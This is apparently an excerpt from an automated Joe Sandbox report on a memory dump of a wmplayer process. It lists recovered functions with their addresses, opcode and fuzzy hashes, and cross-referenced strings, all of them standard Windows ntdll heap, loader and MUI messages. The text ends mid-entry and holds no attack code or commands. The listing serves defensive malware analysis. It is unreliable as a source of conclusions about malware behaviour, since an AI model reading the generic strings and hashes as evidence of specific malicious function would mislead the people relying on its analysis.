                                              Similarity
                                              • API ID:
                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                              • API String ID: 0-2368682639
                                              • Opcode ID: a2c367242470f232b72bf2fbf43497593eb014ed3f8889862d6a34564c0e66b5
                                              • Instruction ID: a72209bc263e4205ed9b19c0fc9502fdc4b47c7f6061f225f928c5608026fc8b
                                              • Opcode Fuzzy Hash: a2c367242470f232b72bf2fbf43497593eb014ed3f8889862d6a34564c0e66b5
                                              • Instruction Fuzzy Hash: 508170B1E10388EFEB10CF95C885BAEBBF9BB09714F144159F519BB641D375A980CB60
                                              Function 033812ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                              • API String ID: 0-3591852110
                                              • Opcode ID: 7a714129c49cced4be26b0135bafc93bfffdacf6084096a07752edcde6b9d61d
                                              • Instruction ID: 3dced8d818fb33245be04c9dbbc4ed2e0209c252f3802814818b4ee24ed5d1b3
                                              • Opcode Fuzzy Hash: 7a714129c49cced4be26b0135bafc93bfffdacf6084096a07752edcde6b9d61d
                                              • Instruction Fuzzy Hash: 16128C34A10741DFD725EF28C881BBAFBF5EF09714F188959E4968BA42D774E882CB50
                                              Function 032CD34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                              • API String ID: 0-3532704233
                                              • Opcode ID: 7bf7492a905bbd07eaf80a9b18a0488089069ee12572ff2fe8990a04f297552c
                                              • Instruction ID: 2b884857b925d11e41a749ca67aa822b6ce1a2b69d71eb266fe51e0913419bde
                                              • Opcode Fuzzy Hash: 7bf7492a905bbd07eaf80a9b18a0488089069ee12572ff2fe8990a04f297552c
                                              • Instruction Fuzzy Hash: E7B181719283959FC725DF24C880A6BFBE8AF88754F054A3EF989D7240D770D984CB92
                                              Function 03369179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                              • API String ID: 0-3063724069
                                              • Opcode ID: 110ad15545368a813eb536d07c8dbae33c59a0e1a933402ca1b0de909c052a8d
                                              • Instruction ID: 51462567d45bb69a117cce33d398a24b80f24760114da5474883a9b97860296c
                                              • Opcode Fuzzy Hash: 110ad15545368a813eb536d07c8dbae33c59a0e1a933402ca1b0de909c052a8d
                                              • Instruction Fuzzy Hash: 87D10272805315AFD721DE54C8C1B6FF7ECAF84B24F448929FA849B154E7B0C9448BE2
                                              Function 03380274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                              • API String ID: 0-1700792311
                                              • Opcode ID: e3066ebd2853c70d8898d5e300c005d4f9b489e7c3aa5000d31ebd7d8c0a2106
                                              • Instruction ID: f2260642e77099eaaafc22df8d9a74af9f603cd88e44d0045a218a9b5ca56b6c
                                              • Opcode Fuzzy Hash: e3066ebd2853c70d8898d5e300c005d4f9b489e7c3aa5000d31ebd7d8c0a2106
                                              • Instruction Fuzzy Hash: D1D1F035520785EFCB1AEF68C891AADFBF5FF4A710F088049E4559BA52C774A988CF10
                                              Function 032CD08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 032CD262
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 032CD2C3
                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 032CD146
                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 032CD0CF
                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 032CD196
                                              • @, xrefs: 032CD313
                                              • @, xrefs: 032CD2AF
                                              • @, xrefs: 032CD0FD
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                              • API String ID: 0-1356375266
                                              • Opcode ID: cb9d12b86e972e3832a7db6f3cca76bdb63cf27b5ed16506d0e8107bba0b7ba5
                                              • Instruction ID: 77840197a593043c03ed5ad1201d5340aaf9143bab82db35fb17e59116bc295b
                                              • Opcode Fuzzy Hash: cb9d12b86e972e3832a7db6f3cca76bdb63cf27b5ed16506d0e8107bba0b7ba5
                                              • Instruction Fuzzy Hash: 26A13B719283559FD721DF25C880B5BFBE8BB84715F004A2EF9989A240D7B4D948CF93
                                              Function 032CF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-523794902
                                              • Opcode ID: 6779208e8ed3179971a64dc67463511c49ca8e7dd743fe378044c3330c01a7ad
                                              • Instruction ID: d3d41d99bc17cfaf19d91dfb8f1e8eff4c49c6485065d57ef963ea665de5c9d7
                                              • Opcode Fuzzy Hash: 6779208e8ed3179971a64dc67463511c49ca8e7dd743fe378044c3330c01a7ad
                                              • Instruction Fuzzy Hash: DC420235638381AFC714DF28C984A2AFBEAFF84704F184A6DE4958B351D774E885CB52
                                              Function 032EB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                              • API String ID: 0-122214566
                                              • Opcode ID: 2e202f66969b20aca2bb12b477430289933d14b8bb3f85391b51332efe17c46b
                                              • Instruction ID: 2a0301ff7001290be29b8e9c5d4cac320f314b7f2f5608e77004160a67999246
                                              • Opcode Fuzzy Hash: 2e202f66969b20aca2bb12b477430289933d14b8bb3f85391b51332efe17c46b
                                              • Instruction Fuzzy Hash: F8C14A35A28315ABDF24DB68C8D3BBEB7A5AF46310F588069E8019F690D7F4D9C4C391
                                              Function 033063FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-792281065
                                              • Opcode ID: 82a90e3db661dad7344f495364a5cacd252254fefa13b88afffac0b15cbc033e
                                              • Instruction ID: 0f99ab207ae2da3736d5a98fc7b1abd0e23d8578f2c09580b2d67dcc3c7a3658
                                              • Opcode Fuzzy Hash: 82a90e3db661dad7344f495364a5cacd252254fefa13b88afffac0b15cbc033e
                                              • Instruction Fuzzy Hash: 34912474E103149BEB24EF55DCDABAEB7E8EF41B24F180129E8116B6C5D7B4B881C790
                                              Function 03302674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03342180
                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0334219F
                                              • RtlGetAssemblyStorageRoot, xrefs: 03342160, 0334219A, 033421BA
                                              • SXS: %s() passed the empty activation context, xrefs: 03342165
                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03342178
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 033421BF
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                              • API String ID: 0-861424205
                                              • Opcode ID: f47e0b7305c9912f306b35e33e40ebf7ebeadb46a653b487c29c0d1675a7b130
                                              • Instruction ID: 517d90f0cc50212b12d2207799411f261569a9432a468cae85065df910045dae
                                              • Opcode Fuzzy Hash: f47e0b7305c9912f306b35e33e40ebf7ebeadb46a653b487c29c0d1675a7b130
                                              • Instruction Fuzzy Hash: 21310636F40214ABE721CA999CD5F9FB6B8DF94F90F090459BA05FB182D270EA40C7A1
                                              Function 0330C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpInitializeImportRedirection, xrefs: 03348177, 033481EB
                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 033481E5
                                              • minkernel\ntdll\ldrinit.c, xrefs: 0330C6C3
                                              • Loading import redirection DLL: '%wZ', xrefs: 03348170
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03348181, 033481F5
                                              • LdrpInitializeProcess, xrefs: 0330C6C4
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 0-475462383
                                              • Opcode ID: 2585237284ba301f71db7403a7a4129675f1712267572bdf71c971658528b573
                                              • Instruction ID: 37282bd2354945e50d37c877a896240e9d0f2f53f767a259f4a0c3b8d7f3d749
                                              • Opcode Fuzzy Hash: 2585237284ba301f71db7403a7a4129675f1712267572bdf71c971658528b573
                                              • Instruction Fuzzy Hash: A9310779A543459FC214EF28DDD5E1EB7E4EF84B10F050658F9416F291D660FC44C7A2
                                              Function 032F51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                              Download Yara Rule
                                              Strings
                                              • Kernel-MUI-Number-Allowed, xrefs: 032F5247
                                              • Kernel-MUI-Language-SKU, xrefs: 032F542B
                                              • Kernel-MUI-Language-Disallowed, xrefs: 032F5352
                                              • Kernel-MUI-Language-Allowed, xrefs: 032F527B
                                              • WindowsExcludedProcs, xrefs: 032F522A
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                              • API String ID: 0-258546922
                                              • Opcode ID: 9e54289b88fb1fe685bfd3a5feed9e009d92eda213d9fcdc9230eae2de226ffe
                                              • Instruction ID: 27cf3da0b2ecf522f3e467a86feacc89780cf8b0bd7b174b90870ab84169fb6e
                                              • Opcode Fuzzy Hash: 9e54289b88fb1fe685bfd3a5feed9e009d92eda213d9fcdc9230eae2de226ffe
                                              • Instruction Fuzzy Hash: 15F14D76D20629EFCB15DF98C9809EEFBFDFF49650F25406AE501AB210D7709E418B90
                                              Function 032FD7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1975516107
                                              • Opcode ID: 54da594a7568d8b44f2c996efb8d661267ccb6face6652da69d3c1b1702fdd45
                                              • Instruction ID: 996560effc470ba0d1ab92f97cabd7fb60df8df33e84d26bc726f0fe77094a12
                                              • Opcode Fuzzy Hash: 54da594a7568d8b44f2c996efb8d661267ccb6face6652da69d3c1b1702fdd45
                                              • Instruction Fuzzy Hash: 24510175E2434ADFDB10EFA8E58579DFBB1BF48314F188169C5016B299C7B0A8C2CB80
                                              Function 032C76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                              • API String ID: 0-3061284088
                                              • Opcode ID: 31ff02192d1a2b290e76511a61e11315be5aded2e3759a9a1b92eaca0d27dcb9
                                              • Instruction ID: 18d340a73cfbf8a174850067eb8b25704b70fcba7e848402359325096c07faa7
                                              • Opcode Fuzzy Hash: 31ff02192d1a2b290e76511a61e11315be5aded2e3759a9a1b92eaca0d27dcb9
                                              • Instruction Fuzzy Hash: 3D01DD36134790DFD226D71C985AF66FBD8DB42B30F28815DE0515BD51CAE858C0C664
                                              Function 032E70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                              • API String ID: 0-3178619729
                                              • Opcode ID: 332a66fa3b1659e4cae41f31625d618877c2068c77a1d78c0babce5d19365096
                                              • Instruction ID: a18f9c43bffac23287f2a054fbb520af5b8b99b4f135ba7695848e003da5a642
                                              • Opcode Fuzzy Hash: 332a66fa3b1659e4cae41f31625d618877c2068c77a1d78c0babce5d19365096
                                              • Instruction Fuzzy Hash: B813E170A20656DFDB24CF68C4817A9FBF1FF49704F5881A9D899AB381D774A881CF90
                                              Function 032E1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-3570731704
                                              • Opcode ID: 72d077f73c7f159c04837e1c5b4258f71784753f0480727b759aff8d52d1200e
                                              • Instruction ID: 6bad834916aec5b63eadde1cee73f512213ef0717449c61987f67ed06d57b73d
                                              • Opcode Fuzzy Hash: 72d077f73c7f159c04837e1c5b4258f71784753f0480727b759aff8d52d1200e
                                              • Instruction Fuzzy Hash: 7E924A75A21269CFEB24CF18CC91BA9B7B5BF45310F0981EAD849AB250D774AEC0CF51
                                              Function 032DA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                              • API String ID: 0-379654539
                                              • Opcode ID: b01daa6d0b0125e5a323249a307e85a0c99a16e1c35706ae5b1485f7ca317e05
                                              • Instruction ID: 46e508dbe8b34f8b2d6d5cf3e8031e2d830086de48093cf7c9c4304d70cc2011
                                              • Opcode Fuzzy Hash: b01daa6d0b0125e5a323249a307e85a0c99a16e1c35706ae5b1485f7ca317e05
                                              • Instruction Fuzzy Hash: 60C16975528382CFC721CF18C484B6BB7E4BF85704F04896AF896CB250E774CA89CB92
                                              Function 0330273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 033422B6
                                              • .Local, xrefs: 033028D8
                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 033421D9, 033422B1
                                              • SXS: %s() passed the empty activation context, xrefs: 033421DE
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                              • API String ID: 0-1239276146
                                              • Opcode ID: 767889548566360e26d83a520334040ff97f350d37a6b3ec9a708760de55ad1e
                                              • Instruction ID: 3e669fd251158d13087a12ef2a7796897905257d0fa50f57f086c6f5b533186b
                                              • Opcode Fuzzy Hash: 767889548566360e26d83a520334040ff97f350d37a6b3ec9a708760de55ad1e
                                              • Instruction Fuzzy Hash: D0A182359002299BCB24CF54CCD8BAAB3B5BF58314F1945E9E848EB691D730AEC0CF94
                                              Function 032CF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                              • API String ID: 0-2586055223
                                              • Opcode ID: 103f588cb62d455c9ceb68664aaeddb47d421ca8fef7574437bfd4d1fc485213
                                              • Instruction ID: da47d9fcf84df27939f230cdfa378f5acc0ca1e4000c51cd86384a6b91fc73bc
                                              • Opcode Fuzzy Hash: 103f588cb62d455c9ceb68664aaeddb47d421ca8fef7574437bfd4d1fc485213
                                              • Instruction Fuzzy Hash: B7613636224780AFD721DB68CD86F27BBE9FF80714F180569FA658B291D774D880CB61
                                              Function 033811A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                              • API String ID: 0-336120773
                                              • Opcode ID: 75ec7c8339630b1f3f2e17faafcabea51b6fbb189411ce7876b4111faca2c614
                                              • Instruction ID: 0a0293e9bb12c0f58744dbd81c6703e571a7d778b93b0b3e1ee84472ccdafe2c
                                              • Opcode Fuzzy Hash: 75ec7c8339630b1f3f2e17faafcabea51b6fbb189411ce7876b4111faca2c614
                                              • Instruction Fuzzy Hash: D231F435A20750EFCB10EB98CCC6F6AB3E9EF09720F184559F441DB652D670AD81CA55
                                              Function 032C9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                              • API String ID: 0-1391187441
                                              • Opcode ID: d7b6020b03535b9e230a3ea7e340fc6dcc123b7b76646496e3a0a5c75bbab324
                                              • Instruction ID: 59ae0ab60e82170a2a157f27bb1572c2055f40a8fb0a33748642f4202f01e54f
                                              • Opcode Fuzzy Hash: d7b6020b03535b9e230a3ea7e340fc6dcc123b7b76646496e3a0a5c75bbab324
                                              • Instruction Fuzzy Hash: 8C31E336A20294EFCB01DB49C885FAEFBBCEF45B20F154155E814AB691D7B0E9C0CA60
                                              Function 032E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-4253913091
                                              • Opcode ID: eb9b82d3c8fb0ee7919de818adffaba782f6d0fb760f777c1b03df2764f57be6
                                              • Instruction ID: 89150c04591f83a78673957130aace38156006417c189a222d912402905956ca
                                              • Opcode Fuzzy Hash: eb9b82d3c8fb0ee7919de818adffaba782f6d0fb760f777c1b03df2764f57be6
                                              • Instruction Fuzzy Hash: 90F1C034A10606DFEB14CF69C895B6AB7F9FF46700F1881A8E416DB341D7B4E982CB90
                                              Function 032DB6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                              • API String ID: 0-1145731471
                                              • Opcode ID: 2937127d0669c62a91f69c16a5abcdaa9a1e4d9b656ffaffb5dc8a47a05cb923
                                              • Instruction ID: 26f1f6304a29bf245e6be1bc1a28cf856dbc7ed7e43d106492e19c8767ffb2f3
                                              • Opcode Fuzzy Hash: 2937127d0669c62a91f69c16a5abcdaa9a1e4d9b656ffaffb5dc8a47a05cb923
                                              • Instruction Fuzzy Hash: EDB1BC3AE246458BDB25CF68C8D0BADB7B5EF45721F19C929E851EB380D370E884CB50
                                              Function 0335368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                              • API String ID: 0-2391371766
                                              • Opcode ID: a29792c652f3d56923f46dbd3e96b2175dbeab103fff6f64a34aea2780b8b99c
                                              • Instruction ID: 5b409ab2a0677564a2633c96f36fced9dccc0deb060bcfda1e1e2bf418b36099
                                              • Opcode Fuzzy Hash: a29792c652f3d56923f46dbd3e96b2175dbeab103fff6f64a34aea2780b8b99c
                                              • Instruction Fuzzy Hash: 85B19CBAA14345AFE711DE54CCC1F6BB7ECEB447A0F084929FA519B280D770E844CB92
                                              Function 032CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: FilterFullPath$UseFilter$\??\
                                              • API String ID: 0-2779062949
                                              • Opcode ID: 153efb537fd16247ca5dc4c6f921ee65e52b17ab06ca6b868a9ccc83ef77fa09
                                              • Instruction ID: 0c25bb7673b93d149bd68ffd61275d4912cba0d1cb2cd06c23e1d5d892059bf6
                                              • Opcode Fuzzy Hash: 153efb537fd16247ca5dc4c6f921ee65e52b17ab06ca6b868a9ccc83ef77fa09
